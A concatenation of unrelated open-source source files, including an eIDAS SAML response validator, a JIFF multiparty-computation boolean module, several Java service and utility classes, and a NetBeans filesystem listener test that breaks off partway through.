EIDAS-Sources-2.5.0-SNAPSHOT-MDSL/EIDAS-SAMLEngine/src/main/java/eu/eidas/auth/engine/core/validator/eidas/EidasResponseValidator.java
/* * Copyright (c) 2019 by European Commission * * Licensed under the EUPL, Version 1.2 or - as soon they will be * approved by the European Commission - subsequent versions of the * EUPL (the "Licence"); * You may not use this work except in compliance with the Licence. * You may obtain a copy of the Licence at: * https://joinup.ec.europa.eu/page/eupl-text-11-12 * * Unless required by applicable law or agreed to in writing, software * distributed under the Licence is distributed on an "AS IS" basis, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or * implied. * See the Licence for the specific language governing permissions and * limitations under the Licence. * */ package eu.eidas.auth.engine.core.validator.eidas; import eu.eidas.auth.commons.EidasParameterKeys; import eu.eidas.auth.commons.EidasParameters; import eu.eidas.engine.exceptions.ValidationException; import net.shibboleth.utilities.java.support.xml.SerializeSupport; import org.opensaml.saml.common.SAMLVersion; import org.opensaml.saml.saml2.core.Response; import org.opensaml.saml.saml2.core.StatusCode; import org.w3c.dom.Element; import java.util.Objects; import java.util.Optional; import java.util.stream.Stream; import static eu.eidas.auth.engine.core.validator.eidas.EidasValidator.validateNotNull; import static eu.eidas.auth.engine.core.validator.eidas.EidasValidator.validateOK; import static java.nio.charset.StandardCharsets.UTF_8; /** * eIDAS validator for {@link Response}. 
 */
public class EidasResponseValidator extends ResponseSchemaValidator implements EidasValidator {

    // SAML 2.0 consent identifier URIs accepted in the Response's Consent attribute.
    static final String[] CONSENT_ALLOWED_VALUES = {
            "urn:oasis:names:tc:SAML:2.0:consent:obtained",
            "urn:oasis:names:tc:SAML:2.0:consent:prior",
            "urn:oasis:names:tc:SAML:2.0:consent:current-implicit",
            "urn:oasis:names:tc:SAML:2.0:consent:current-explicit",
            "urn:oasis:names:tc:SAML:2.0:consent:unspecified",
            "urn:oasis:names:tc:SAML:2.0:consent:unavailable",
            "urn:oasis:names:tc:SAML:2.0:consent:inapplicable"
    };

    public EidasResponseValidator() {
        super();
    }

    /**
     * Validates a single {@link Response} and throws a {@link ValidationException} if the validation fails.
     *
     * @param response the {@link Response} to validate
     * @throws ValidationException when an invalid value was found
     */
    @Override
    public void validate(Response response) throws ValidationException {
        // Size check first: serialize the DOM and compare its byte length against the configured maximum.
        Element node = Objects.requireNonNull(response.getDOM());
        int responseSize = SerializeSupport.prettyPrintXML(node).getBytes(UTF_8).length;
        validateOK(responseSize <= getMaxSize(), "SAML Response exceeds max size.");
        // Schema-level validation performed by the parent class.
        super.validate(response);
        validateNotNull(response.getID(), "ID is required");
        validateNotNull(response.getInResponseTo(), "InResponseTo is required");
        validateNotNull(response.getVersion(), "Version is required.");
        validateOK(SAMLVersion.VERSION_20.equals(response.getVersion()), "Version is invalid.");
        validateNotNull(response.getIssueInstant(), "IssueInstant is required");
        validateNotNull(response.getDestination(), "Destination is required");
        validateConsent(response.getConsent());
        validateNotNull(response.getIssuer(), "Issuer is required.");
        validateNotNull(response.getStatus(), "Status is required.");
        validateNotNull(response.getSignature(), "Signature is required.");
        // A response whose status code is SUCCESS must carry at least one assertion;
        // non-success responses are allowed to have an empty/absent assertion list.
        validateOK((!StatusCode.SUCCESS.equals(response.getStatus().getStatusCode().getValue())
                || !(response.getAssertions() == null || response.getAssertions().isEmpty())), "Assertion is required");
    }

    /**
     * Validates the consent, it is optional, but when not null, it should be one of:
     * <ul>
     * <li>urn:oasis:names:tc:SAML:2.0:consent:obtained</li>
     * <li>urn:oasis:names:tc:SAML:2.0:consent:prior</li>
     * <li>urn:oasis:names:tc:SAML:2.0:consent:current-implicit</li>
     * <li>urn:oasis:names:tc:SAML:2.0:consent:current-explicit</li>
     * <li>urn:oasis:names:tc:SAML:2.0:consent:unspecified</li>
     * <li>urn:oasis:names:tc:SAML:2.0:consent:unavailable</li>
     * <li>urn:oasis:names:tc:SAML:2.0:consent:inapplicable</li>
     * </ul>
     *
     * @param consent the consent
     * @throws ValidationException when the consent is invalid
     */
    private static void validateConsent(String consent) throws ValidationException {
        // Consent is optional
        if (consent != null) {
            Optional<String> consentOptional = Stream.of(CONSENT_ALLOWED_VALUES)
                    .filter(consent::equals)
                    .findAny();
            validateOK(consentOptional.isPresent(), "Consent is invalid");
        }
    }

    // Maximum accepted byte size for an incoming SAML response, read from EidasParameters.
    private int getMaxSize(){
        return EidasParameters.getMaxSizeFor(EidasParameterKeys.SAML_RESPONSE);
    }
}
1725136424/gulimall
gulimall-product/src/main/java/site/wanjiahao/gulimall/product/service/CategoryService.java
<filename>gulimall-product/src/main/java/site/wanjiahao/gulimall/product/service/CategoryService.java
package site.wanjiahao.gulimall.product.service;

import com.baomidou.mybatisplus.extension.service.IService;
import site.wanjiahao.common.utils.PageUtils;
import site.wanjiahao.gulimall.product.entity.CategoryEntity;
import site.wanjiahao.gulimall.product.vo.IndexCategoryLevel2RespVo;

import java.util.List;
import java.util.Map;

/**
 * Three-level product category service.
 *
 * @author haodada
 * @email <EMAIL>
 * @date 2020-10-01 16:18:27
 */
public interface CategoryService extends IService<CategoryEntity> {

    /** Generic paged query driven by the raw request-parameter map. */
    PageUtils queryPage(Map<String, Object> params);

    /** Lists all categories; presumably assembled into a tree — confirm against the implementation. */
    List<CategoryEntity> listWithTree();

    /** Lists the categories whose parent category id equals {@code pcid}. */
    List<CategoryEntity> listCategoryByPcid(Long pcid);

    /** Persists updates for several categories in one batch. */
    void updateBatch(List<CategoryEntity> categoryEntities);

    /** Returns the id path from the root category down to {@code catelogId}. */
    List<Long> listCategoryPath(Long catelogId);

    /** Loads a single category by its id. */
    CategoryEntity listById(Long catelogId);

    /** Paged category listing filtered by brand id. */
    PageUtils listWithPageByBranId(Map<String, Object> params, Long brandId);

    /** Second-level categories for the index page, keyed by first-level category id — TODO confirm key semantics. */
    Map<String, List<IndexCategoryLevel2RespVo>> listCateLevel2();
}
uryyyyyyy/scalaSamples
scalikejdbc/build.sbt
// Build definition for the ScalikeJDBC sample project.
name := """scalikejdbcSample"""

version := "1.0"

scalaVersion := "2.11.7"

// ScalikeJDBC modules are pinned to the same version (2.2.7);
// logback provides the SLF4J backend, MySQL the JDBC driver.
libraryDependencies ++= Seq(
  "org.scalikejdbc" %% "scalikejdbc" % "2.2.7",
  "mysql" % "mysql-connector-java" % "5.1.36",
  "org.scalikejdbc" %% "scalikejdbc-jsr310" % "2.2.7",
  "ch.qos.logback" % "logback-classic" % "1.1.3",
  "org.scalikejdbc" %% "scalikejdbc-test" % "2.2.7" % "test",
  "org.scalatest" %% "scalatest" % "2.2.5" % "test"
)
sgholamian/log-aware-clone-detection
NLPCCd/Camel/1316_2.java
<gh_stars>0
//,temp,sample_5439.java,2,16,temp,sample_1443.java,2,16
//,3
// Clone-detection corpus sample: a method body extracted from a Camel OData batch test.
// The referenced members (responseParts, log, assertEquals, assertNotNull, ODataFeed,
// ODataEntry) belong to the original test fixture and are not defined here.
public class xxx {
    public void dummy_method() {
        // Expect exactly eight parts in the batch response.
        assertEquals("Batch responses expected", 8, responseParts.size());
        assertNotNull(responseParts.get(0).getBody());
        final ODataFeed feed = (ODataFeed) responseParts.get(1).getBody();
        assertNotNull(feed);
        ODataEntry dataEntry = (ODataEntry) responseParts.get(2).getBody();
        assertNotNull(dataEntry);
        dataEntry = (ODataEntry) responseParts.get(3).getBody();
        assertNotNull(dataEntry);
        dataEntry = (ODataEntry) responseParts.get(4).getBody();
        assertNotNull(dataEntry);
        log.info("batch create entry");
    }
};
lucyq/jiff
lib/client/protocols/booleans/boolean.js
<reponame>lucyq/jiff<filename>lib/client/protocols/booleans/boolean.js
// Generic version of operations
module.exports = function (SecretShare) {
  /**
   * bitwise-XOR with a constant (BOTH BITS).
   * @method cxor_bit
   * @param {number} cst - the constant bit to XOR with (0 or 1).
   * @return {module:jiff-client~JIFFClient#SecretShare} this party's share of the result.
   * @memberof module:jiff-client~JIFFClient#SecretShare
   * @instance
   */
  SecretShare.prototype.cxor_bit = function (cst) {
    if (!(this.isConstant(cst))) {
      throw new Error('parameter should be a number (^)');
    }
    if (!this.jiff.share_helpers['binary'](cst)) {
      throw new Error('parameter should be binary (^)');
    }
    // For bits a, b: a XOR b = a + b - 2ab.
    return this.icadd(cst).issub(this.icmult(cst).icmult(2));
  };

  /**
   * bitwise-OR with a constant (BOTH BITS).
   * @method cor_bit
   * @param {number} cst - the constant bit to OR with (0 or 1).
   * @return {module:jiff-client~JIFFClient#SecretShare} this party's share of the result.
   * @memberof module:jiff-client~JIFFClient#SecretShare
   * @instance
   */
  SecretShare.prototype.cor_bit = function (cst) {
    if (!(this.isConstant(cst))) {
      throw new Error('parameter should be a number (|)');
    }
    if (!this.jiff.share_helpers['binary'](cst)) {
      throw new Error('parameter should be binary (|)');
    }
    // For bits a, b: a OR b = a + b - ab.
    return this.icadd(cst).issub(this.icmult(cst));
  };

  /**
   * bitwise-XOR of two secret shares OF BITS.
   * @method sxor_bit
   * @param {module:jiff-client~JIFFClient#SecretShare} o - the share to XOR with.
   * @param {string} [op_id=auto_gen()] - the operation id which is used to identify this operation.
   *                         This id must be unique, and must be passed by all parties to the same instruction, to
   *                         ensure that corresponding instructions across different parties are matched correctly.
   * @return {module:jiff-client~JIFFClient#SecretShare} this party's share of the result.
   * @memberof module:jiff-client~JIFFClient#SecretShare
   * @instance
   */
  SecretShare.prototype.sxor_bit = function (o, op_id) {
    if (!(o.jiff === this.jiff)) {
      throw new Error('shares do not belong to the same instance (^)');
    }
    if (!this.jiff.helpers.Zp_equals(this, o)) {
      throw new Error('shares must belong to the same field (^)');
    }
    if (!this.jiff.helpers.array_equals(this.holders, o.holders)) {
      throw new Error('shares must be held by the same parties (^)');
    }
    if (op_id == null) {
      op_id = this.jiff.counters.gen_op_id('sxor_bit', this.holders);
    }
    // a XOR b = a + b - 2ab; the single secret multiplication gets a deterministic sub-id.
    return this.isadd(o).issub(this.ismult(o, op_id + ':smult1').icmult(2));
  };

  /**
   * OR of two secret shares OF BITS.
   * @method sor_bit
   * @param {module:jiff-client~JIFFClient#SecretShare} o - the share to OR with.
   * @param {string} [op_id=auto_gen()] - the operation id which is used to identify this operation.
   *                         This id must be unique, and must be passed by all parties to the same instruction, to
   *                         ensure that corresponding instructions across different parties are matched correctly.
   * @return {module:jiff-client~JIFFClient#SecretShare} this party's share of the result.
   * @memberof module:jiff-client~JIFFClient#SecretShare
   * @instance
   */
  SecretShare.prototype.sor_bit = function (o, op_id) {
    if (!(o.jiff === this.jiff)) {
      throw new Error('shares do not belong to the same instance (|)');
    }
    if (!this.jiff.helpers.Zp_equals(this, o)) {
      throw new Error('shares must belong to the same field (|)');
    }
    if (!this.jiff.helpers.array_equals(this.holders, o.holders)) {
      throw new Error('shares must be held by the same parties (|)');
    }
    if (op_id == null) {
      op_id = this.jiff.counters.gen_op_id('sor_bit', this.holders);
    }
    // a OR b = a + b - ab.
    return this.isadd(o).issub(this.ismult(o, op_id + ':smult1'));
  };

  /**
   * Negation of a bit.
   * This has to be a share of a BIT in order for this to work properly.
   * @method not
   * @return {module:jiff-client~JIFFClient#SecretShare} this party's share of the result (negated bit).
   * @memberof module:jiff-client~JIFFClient#SecretShare
   * @instance
   */
  SecretShare.prototype.not = function () {
    // NOT(b) = 1 - b for a bit b.
    return this.icmult(-1).icadd(1);
  };

  /**
   * Simulate an oblivious If-else statement with a single return value.
   * Should be called on a secret share of a bit: 0 representing false, and 1 representing true
   * If this is a share of 1, a new sharing of the element represented by the first parameter is returned,
   * otherwise, a new sharing of the second is returned.
   * @method if_else
   * @memberof module:jiff-client~JIFFClient#SecretShare
   * @instance
   * @param {module:jiff-client~JIFFClient#SecretShare | number} trueVal - the value/share to return if this is a sharing of 1.
   * @param {module:jiff-client~JIFFClient#SecretShare | number} falseVal - the value/share to return if this is a sharing of 0.
   * @param {string} [op_id=auto_gen()] - the operation id which is used to identify this operation.
   *                         This id must be unique, and must be passed by all parties to the same instruction, to
   *                         ensure that corresponding instructions across different parties are matched correctly.
   * @return {module:jiff-client~JIFFClient#SecretShare} a new sharing of the result of the if.
   *
   * @example
   * // a and b are secret shares
   * // cmp will be a secret share of either 1 or 0, depending on whether a or b is greater
   * var cmp = a.gt(b);
   *
   * // max is set to the greater value, without revealing the value or the result of the inequality
   * var max = cmp.if_else(a, b);
   */
  SecretShare.prototype.if_else = function (trueVal, falseVal, op_id) {
    if (op_id == null) {
      op_id = this.jiff.counters.gen_op_id('if_else', this.holders);
    }
    // Four cases depending on which operands are public constants; each computes
    // bit * trueVal + (1 - bit) * falseVal with the cheapest available operations.
    var const1 = this.isConstant(trueVal);
    var const2 = this.isConstant(falseVal);
    if (const1 && const2) {
      return this.icmult(trueVal).isadd(this.inot().icmult(falseVal));
    } else if (const1) {
      return this.inot().ismult(falseVal.icsub(trueVal), op_id + ':smult').icadd(trueVal);
    } else if (const2) {
      return this.ismult(trueVal.icsub(falseVal), op_id + ':smult').icadd(falseVal);
    } else {
      return this.ismult(trueVal.issub(falseVal), op_id + ':smult').isadd(falseVal);
    }
  };
};
rxmicro/rxmicro
rxmicro-annotation-processor-rest-server/src/test/resources/output/io.rxmicro.examples.validation.server.required/model/$$PrimitiveStringModelModelReader.java
<reponame>rxmicro/rxmicro
package io.rxmicro.examples.validation.server.required.model;

import io.rxmicro.http.QueryParams;
import io.rxmicro.rest.model.HttpModelType;
import io.rxmicro.rest.model.PathVariableMapping;
import io.rxmicro.rest.server.detail.component.ModelReader;
import io.rxmicro.rest.server.detail.model.HttpRequest;

/**
 * Generated by {@code RxMicro Annotation Processor}
 * (do not edit manually; regenerate via the annotation processor instead).
 */
public final class $$PrimitiveStringModelModelReader extends ModelReader<PrimitiveStringModel> {

    /**
     * Builds a {@link PrimitiveStringModel} by extracting the query parameters
     * from the request and copying them into a fresh model instance.
     */
    @Override
    public PrimitiveStringModel read(final PathVariableMapping pathVariableMapping,
                                     final HttpRequest request,
                                     final boolean readParametersFromBody) {
        final PrimitiveStringModel model = new PrimitiveStringModel();
        final QueryParams params = extractParams(request.getQueryString());
        readPrimitivesToModel(pathVariableMapping, request, params, model, readParametersFromBody);
        return model;
    }

    // Copies each string query parameter into the corresponding model field;
    // validation of required/nullable semantics happens elsewhere.
    public void readPrimitivesToModel(final PathVariableMapping pathVariableMapping,
                                      final HttpRequest request,
                                      final QueryParams params,
                                      final PrimitiveStringModel model,
                                      final boolean readParametersFromBody) {
        model.requiredNotEmptyString = toString(params.getValue("requiredNotEmptyString"), HttpModelType.PARAMETER, "requiredNotEmptyString");
        model.nullableString = toString(params.getValue("nullableString"), HttpModelType.PARAMETER, "nullableString");
        model.allowEmptyString = toString(params.getValue("allowEmptyString"), HttpModelType.PARAMETER, "allowEmptyString");
        model.nullableAndAllowEmptyString = toString(params.getValue("nullableAndAllowEmptyString"), HttpModelType.PARAMETER, "nullableAndAllowEmptyString");
    }
}
murilloSantana/zip-code-search
domain/src/main/java/com/zipcode/zipcodesearch/usecase/address/chain/ValidZipCodeHandler.java
<filename>domain/src/main/java/com/zipcode/zipcodesearch/usecase/address/chain/ValidZipCodeHandler.java
package com.zipcode.zipcodesearch.usecase.address.chain;

import com.zipcode.zipcodesearch.entity.Address;
import com.zipcode.zipcodesearch.usecase.address.dataprovider.adapter.AddressDataProvider;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

import java.util.Optional;

/**
 * Chain-of-responsibility handler that resolves an address for a zip code.
 * On a miss it progressively zeroes out digits from right to left and retries;
 * if no candidate matches, the lookup is delegated to the next handler in the chain.
 */
public class ValidZipCodeHandler implements AddressSearchChain {

    private static final Logger log = LoggerFactory.getLogger(ValidZipCodeHandler.class);

    // Zip codes handled here have exactly 8 digits.
    private static final int ZIP_CODE_LENGTH = 8;

    private AddressSearchChain addressSearchChain;
    private final AddressDataProvider addressDataProvider;

    public ValidZipCodeHandler(AddressDataProvider addressDataProvider) {
        this.addressDataProvider = addressDataProvider;
    }

    @Override
    public void setNextHandler(AddressSearchChain nextHandler) {
        this.addressSearchChain = nextHandler;
    }

    @Override
    public Optional<Address> check(String zipCode) {
        StringBuilder candidate = new StringBuilder(zipCode);
        Optional<Address> found = this.findRecursiveZipCode(candidate, ZIP_CODE_LENGTH - 1);
        if (found.isPresent()) {
            return found;
        }
        // Nothing matched locally: pass the ORIGINAL zip code to the next handler, if any.
        if (this.addressSearchChain == null) {
            return Optional.empty();
        }
        return this.addressSearchChain.check(zipCode);
    }

    /**
     * Looks up the current candidate; when absent and positions remain, replaces the
     * digit at {@code positionToReplace} with '0' and retries one position to the left.
     */
    public Optional<Address> findRecursiveZipCode(StringBuilder zipCodeBuilder, int positionToReplace) {
        String candidate = zipCodeBuilder.toString();
        Optional<Address> address = addressDataProvider.findByZipCode(candidate);
        if (address.isPresent() || positionToReplace <= -1) {
            return address;
        }
        log.info("Valid Address Not Found: ZIP_CODE {}", candidate);
        zipCodeBuilder.setCharAt(positionToReplace, '0');
        return findRecursiveZipCode(zipCodeBuilder, positionToReplace - 1);
    }
}
charwliu/msf4j
analytics/msf4j-analytics-common/src/main/java/org/wso2/msf4j/analytics/common/tracing/TraceEvent.java
<reponame>charwliu/msf4j
/*
 * Copyright (c) 2016, WSO2 Inc. (http://www.wso2.org) All Rights Reserved.
 *
 * WSO2 Inc. licenses this file to you under the Apache License,
 * Version 2.0 (the "License"); you may not use this file except
 * in compliance with the License.
 * You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing,
 * software distributed under the License is distributed on an
 * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 * KIND, either express or implied. See the License for the
 * specific language governing permissions and limitations
 * under the License.
 */
package org.wso2.msf4j.analytics.common.tracing;

/**
 * Class to hold tracing start event data.
 * Identity fields (type, traceId, originId, time) are fixed at construction;
 * the remaining details are filled in via setters as the trace progresses.
 */
public class TraceEvent {

    // Immutable event identity, set once in the constructor.
    private final String type;
    private final String traceId;
    private final String originId;
    private final long time;

    // Mutable trace details populated later through setters.
    private int statusCode;
    private String httpMethod;
    private String instanceId;
    private String instanceName;
    private String parentId;
    private String url;

    public TraceEvent(String type, String traceId, String originId, long time) {
        this.type = type;
        this.traceId = traceId;
        this.originId = originId;
        this.time = time;
    }

    public String getType() {
        return type;
    }

    public String getTraceId() {
        return traceId;
    }

    public String getOriginId() {
        return originId;
    }

    public long getTime() {
        return time;
    }

    public String getInstanceId() {
        return instanceId;
    }

    public void setInstanceId(String instanceId) {
        this.instanceId = instanceId;
    }

    public String getInstanceName() {
        return instanceName;
    }

    public void setInstanceName(String instanceName) {
        this.instanceName = instanceName;
    }

    public String getParentId() {
        return parentId;
    }

    public void setParentId(String parentId) {
        this.parentId = parentId;
    }

    public int getStatusCode() {
        return statusCode;
    }

    public void setStatusCode(int statusCode) {
        this.statusCode = statusCode;
    }

    public String getHttpMethod() {
        return httpMethod;
    }

    public void setHttpMethod(String httpMethod) {
        this.httpMethod = httpMethod;
    }

    public String getUrl() {
        return url;
    }

    public void setUrl(String url) {
        this.url = url;
    }

    @Override
    public String toString() {
        return "TraceEvent{" +
                "type='" + type + '\'' +
                ", traceId='" + traceId + '\'' +
                ", originId='" + originId + '\'' +
                ", time=" + time +
                ", statusCode=" + statusCode +
                ", httpMethod='" + httpMethod + '\'' +
                ", instanceId='" + instanceId + '\'' +
                ", instanceName='" + instanceName + '\'' +
                ", parentId='" + parentId + '\'' +
                ", url='" + url + '\'' +
                '}';
    }
}
guardian/dotcom-rendering
dotcom-rendering/cypress/lib/privacySettingsIframe.js
<gh_stars>100-1000
/**
 * Returns a Cypress chainable wrapped around the body of the Sourcepoint
 * privacy-manager iframe, retrying until the iframe's document body is non-empty.
 * Relies on the Cypress global `cy`.
 */
export const privacySettingsIframe = () => {
	return cy
		.get('[src*="https://cdn.privacy-mgmt.com/privacy-manager"]')
		.its('0.contentDocument.body')
		.should('not.be.empty')
		.then(cy.wrap);
};
liuyukuai/commons
commons-core/src/main/java/com/itxiaoer/commons/core/util/UUIDUtils.java
package com.itxiaoer.commons.core.util;

import com.itxiaoer.commons.core.date.LocalDateTimeUtil;

import java.time.LocalDateTime;
import java.util.UUID;

/**
 * Utility for generating time-prefixed unique identifiers.
 *
 * @author : liuyk
 */
@SuppressWarnings("unused")
public final class UUIDUtils {

    private UUIDUtils() {
        // Utility class: prevent instantiation.
    }

    /**
     * Generates a unique identifier: the current timestamp formatted with the
     * pattern {@code yyyyMMddHHmmssSSSSSS}, followed by the first 20 hex
     * characters of a random UUID (dashes removed).
     *
     * @return a time-prefixed unique identifier
     */
    public static String guid() {
        String timestamp = LocalDateTimeUtil.format(LocalDateTime.now(), "yyyyMMddHHmmssSSSSSS");
        String randomPart = UUID.randomUUID().toString().replace("-", "").substring(0, 20);
        return timestamp + randomPart;
    }
}
leginee/netbeans
dlight/dlight.remote.impl/test/unit/src/org/netbeans/modules/remote/impl/fs/ListenersParityTestCase.java
/* * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS HEADER. * * Copyright 2010 Oracle and/or its affiliates. All rights reserved. * * Oracle and Java are registered trademarks of Oracle and/or its affiliates. * Other names may be trademarks of their respective owners. * * The contents of this file are subject to the terms of either the GNU * General Public License Version 2 only ("GPL") or the Common * Development and Distribution License("CDDL") (collectively, the * "License"). You may not use this file except in compliance with the * License. You can obtain a copy of the License at * http://www.netbeans.org/cddl-gplv2.html * or nbbuild/licenses/CDDL-GPL-2-CP. See the License for the * specific language governing permissions and limitations under the * License. When distributing the software, include this License Header * Notice in each file and include the License file at * nbbuild/licenses/CDDL-GPL-2-CP. Oracle designates this * particular file as subject to the "Classpath" exception as provided * by Oracle in the GPL Version 2 section of the License file that * accompanied this code. If applicable, add the following below the * License Header, with the fields enclosed by brackets [] replaced by * your own identifying information: * "Portions Copyrighted [year] [name of copyright owner]" * * If you wish your version of this file to be governed by only the CDDL * or only the GPL Version 2, indicate your decision by adding * "[Contributor] elects to include this software in this distribution * under the [CDDL or GPL Version 2] license." If you do not indicate a * single choice of license, a recipient has the option to distribute * your version of this file under either the CDDL, the GPL Version 2 or * to extend the choice of license to its licensees as provided above. * However, if you add GPL Version 2 code and therefore, elected the GPL * Version 2 license, then the option applies only if the new code is * made subject to such option by the copyright holder. 
 *
 * Contributor(s):
 *
 * Portions Copyrighted 2008 Sun Microsystems, Inc.
 */
package org.netbeans.modules.remote.impl.fs;

import java.io.File;
import java.io.IOException;
import java.io.PrintStream;
import junit.framework.Test;
import org.netbeans.modules.nativeexecution.api.ExecutionEnvironment;
import org.netbeans.modules.nativeexecution.api.util.ProcessUtils;
import org.netbeans.modules.nativeexecution.test.ForAllEnvironments;
import org.netbeans.modules.nativeexecution.test.RcFile.FormatException;
import org.netbeans.modules.remote.spi.FileSystemProvider;
import org.netbeans.modules.remote.test.RemoteApiTest;
import org.openide.filesystems.FileLock;
import org.openide.filesystems.FileObject;
import org.openide.filesystems.FileUtil;

/**
 * There hardly is a way to unit test remote operations.
 * This is just an entry point for manual validation.
 *
 * Each scenario is run twice — once against a remote base dir, once against a
 * local one — with all file-change events dumped to log files; the two logs
 * must be identical (local masterfs behavior is the reference).
 */
public class ListenersParityTestCase extends RemoteFileTestBase {

    public ListenersParityTestCase(String testName) {
        super(testName);
    }

    public ListenersParityTestCase(String testName, ExecutionEnvironment execEnv) throws IOException, FormatException {
        super(testName, execEnv);
    }

    // Builds a small tree under baseDirFO, renames a leaf file and a folder,
    // dumping every observed file-change event to 'log'.
    private void doTestListenersRename2(FileObject baseDirFO, File log, boolean recursive) throws Exception {
        PrintStream out = new PrintStream(log);
        try {
            String prefix = baseDirFO.getPath();
            DumpingFileChangeListener fcl = new DumpingFileChangeListener("baseDir", prefix, out, true);
            if (recursive) {
                // Recursive listener on the base dir covers the whole subtree.
                FileSystemProvider.addRecursiveListener(fcl, baseDirFO.getFileSystem(), baseDirFO.getPath());
            } else {
                baseDirFO.addFileChangeListener(fcl);
            }
            FileObject childFO = baseDirFO.createData("child_file_1");
            FileObject subdirFO = baseDirFO.createFolder("child_folder");
            if (!recursive) {
                // Non-recursive mode: attach a listener to the subfolder explicitly.
                subdirFO.addFileChangeListener(new DumpingFileChangeListener(subdirFO.getNameExt(), prefix, out, true));
            }
            FileObject grandChildFO = subdirFO.createData("grand_child_file");
            FileObject grandChildDirFO = subdirFO.createFolder("grand_child_dir");
            FileObject grandGrandChildFO = grandChildDirFO.createData("grand_grand_child_file");
            baseDirFO.refresh();
            FileLock lock = grandGrandChildFO.lock();
            try {
                grandGrandChildFO.rename(lock, "grand_grand_child_file_renamed", "txt");
            } finally {
                lock.releaseLock();
            }
            lock = subdirFO.lock();
            try {
                subdirFO.rename(lock, "child_folder_renamed", "dir");
            } finally {
                lock.releaseLock();
            }
            // baseDirFO.refresh() will break the test. TODO: investigate.
            baseDirFO.refresh();
        } finally {
            out.close();
        }
    }

    // Same tree as the rename scenario, but deletes the leaf file and its parent dir.
    private void doTestListenersDelete2(FileObject baseDirFO, File log, boolean recursive) throws Exception {
        PrintStream out = new PrintStream(log);
        try {
            String prefix = baseDirFO.getPath();
            DumpingFileChangeListener fcl = new DumpingFileChangeListener("baseDir", prefix, out, true);
            if (recursive) {
                FileSystemProvider.addRecursiveListener(fcl, baseDirFO.getFileSystem(), baseDirFO.getPath());
            } else {
                baseDirFO.addFileChangeListener(fcl);
            }
            FileObject childFO = baseDirFO.createData("child_file_1");
            FileObject subdirFO = baseDirFO.createFolder("child_folder");
            if (!recursive) {
                subdirFO.addFileChangeListener(new DumpingFileChangeListener(subdirFO.getNameExt(), prefix, out, true));
            }
            FileObject grandChildFO = subdirFO.createData("grand_child_file");
            FileObject grandChildDirFO = subdirFO.createFolder("grand_child_dir");
            FileObject grandGrandChildFO = grandChildDirFO.createData("grand_grand_child_file");
            baseDirFO.refresh();
            grandGrandChildFO.delete();
            grandChildDirFO.delete();
        } finally {
            out.close();
        }
    }

    // Runs the rename scenario against both a remote and a local base dir
    // and asserts that the recorded event logs are identical.
    private void doTestListenersRename1(boolean recursive) throws Throwable {
        File localTmpDir = createTempFile(getClass().getSimpleName(), ".tmp", true);
        String remoteBaseDir = null;
        try {
            remoteBaseDir = mkTempAndRefreshParent(true);
            FileObject remoteBaseDirFO = getFileObject(remoteBaseDir);
            FileObject localBaseDirFO = FileUtil.toFileObject(FileUtil.normalizeFile(localTmpDir));
            File workDir = getWorkDir();
            File remoteLog = new File(workDir, "remote.dat");
            File localLog = new File(workDir, "local.dat");
            doTestListenersRename2(remoteBaseDirFO, remoteLog, recursive);
            doTestListenersRename2(localBaseDirFO, localLog, recursive);
            if (RemoteApiTest.TRACE_LISTENERS) {
                printFile(localLog, "LOCAL ", System.out);
                printFile(remoteLog, "REMOTE", System.out);
            }
            File diff = new File(workDir, "diff.diff");
            try {
                assertFile("Remote and local events differ, see diff " + remoteLog.getAbsolutePath() + " " + localLog.getAbsolutePath(), remoteLog, localLog, diff);
            } catch (Throwable ex) {
                if (diff.exists()) {
                    printFile(diff, null, System.err);
                }
                throw ex;
            }
        } finally {
            removeRemoteDirIfNotNull(remoteBaseDir);
            if (localTmpDir != null && localTmpDir.exists()) {
                removeDirectory(localTmpDir);
            }
        }
    }

    // Runs the delete scenario against both a remote and a local base dir
    // and asserts that the recorded event logs are identical.
    private void doTestListenersDelete1(boolean recursive) throws Throwable {
        File localTmpDir = createTempFile(getClass().getSimpleName(), ".tmp", true);
        String remoteBaseDir = null;
        try {
            remoteBaseDir = mkTempAndRefreshParent(true);
            FileObject remoteBaseDirFO = getFileObject(remoteBaseDir);
            FileObject localBaseDirFO = FileUtil.toFileObject(FileUtil.normalizeFile(localTmpDir));
            File workDir = getWorkDir();
            File remoteLog = new File(workDir, "remote.dat");
            File localLog = new File(workDir, "local.dat");
            doTestListenersDelete2(remoteBaseDirFO, remoteLog, recursive);
            doTestListenersDelete2(localBaseDirFO, localLog, recursive);
            if (RemoteApiTest.TRACE_LISTENERS) {
                printFile(localLog, "LOCAL ", System.out);
                printFile(remoteLog, "REMOTE", System.out);
            }
            File diff = new File(workDir, "diff.diff");
            try {
                assertFile("Remote and local events differ, see diff " + remoteLog.getAbsolutePath() + " " + localLog.getAbsolutePath(), remoteLog, localLog, diff);
            } catch (Throwable ex) {
                if (diff.exists()) {
                    printFile(diff, null, System.err);
                }
                throw ex;
            }
        } finally {
            removeRemoteDirIfNotNull(remoteBaseDir);
            if (localTmpDir != null && localTmpDir.exists()) {
                removeDirectory(localTmpDir);
            }
        }
    }

    // Runs the change scenario (remote possibly externally modified, local always
    // internally modified) and asserts that the recorded event logs are identical.
    private void doTestListenersChange1(boolean externalChange) throws Throwable {
        File localTmpDir = createTempFile(getClass().getSimpleName(), ".tmp", true);
        String remoteBaseDir = null;
        try {
            remoteBaseDir = mkTempAndRefreshParent(true);
            FileObject remoteBaseDirFO = getFileObject(remoteBaseDir);
            FileObject localBaseDirFO = FileUtil.toFileObject(FileUtil.normalizeFile(localTmpDir));
            File workDir = getWorkDir();
            File remoteLog = new File(workDir, "remote.dat");
            File localLog = new File(workDir, "local.dat");
            doTestListenersChange2(remoteBaseDirFO, remoteLog, externalChange);
            // for an external change I wasn't able to make masterfs to fire file change event;
            // but if external change to remote fs behaves the same way internal change for local fs does - then we are fine.
            doTestListenersChange2(localBaseDirFO, localLog, false);
            if (RemoteApiTest.TRACE_LISTENERS) {
                printFile(localLog, "LOCAL ", System.out);
                printFile(remoteLog, "REMOTE", System.out);
            }
            File diff = new File(workDir, "diff.diff");
            try {
                assertFile("Remote and local events differ, see diff " + remoteLog.getAbsolutePath() + " " + localLog.getAbsolutePath(), remoteLog, localLog, diff);
            } catch (Throwable ex) {
                if (diff.exists()) {
                    printFile(diff, null, System.err);
                }
